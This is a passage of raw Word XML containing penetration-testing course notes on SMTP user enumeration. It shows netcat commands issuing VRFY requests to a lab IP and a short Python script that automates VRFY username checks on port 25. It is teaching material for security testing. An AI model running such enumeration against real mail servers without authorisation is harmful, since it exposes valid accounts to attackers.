    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 6.4.5. SMTP Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">We can also gather information about a host or network from vulnerable mail servers. The</w:t>
      </w:r>
      <w:hyperlink r:id="rId828">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId829">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Simple Mail Transport Protocol</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SMTP) supports several interesting commands, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VRFY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list. These can often be abused to verify existing users on a mail server, which is useful information during a penetration test. Consider the following example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2082800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="114" name="image122.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image122.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId830"/>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27BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nv 192.168.50.8 25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VRFY root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1426"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VRFY idontexist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can observe how the success and error messages differ. The 252</w:t>
      </w:r>
      <w:hyperlink r:id="rId831">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId832">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SMTP response code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not verify the root user exists but will accept and attempt delivery of any messages. Response code 550 indicates the mailbox is unavailable. This procedure can be used to help guess valid usernames in an automated fashion. Next, let's consider the following Python script, which opens a TCP socket, connects to the SMTP server, and issues a VRFY command for a given username:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if len(sys.argv) != 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("Usage: vrfy.py &lt;username&gt; &lt;target_ip&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        sys.exit(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Create a Socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Connect to the Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip = sys.argv[2]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connect = s.connect((ip,25))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Receive the banner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">banner = s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">print(banner)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># VRFY a user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user = (sys.argv[1]).encode()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s.send(b'VRFY ' + user + b'\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">result = s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">print(result)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Close the socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can run the script by providing the username to be tested as a first argument and the target IP as a second argument.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="184" name="image180.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image180.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId833"/>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27E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="329"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
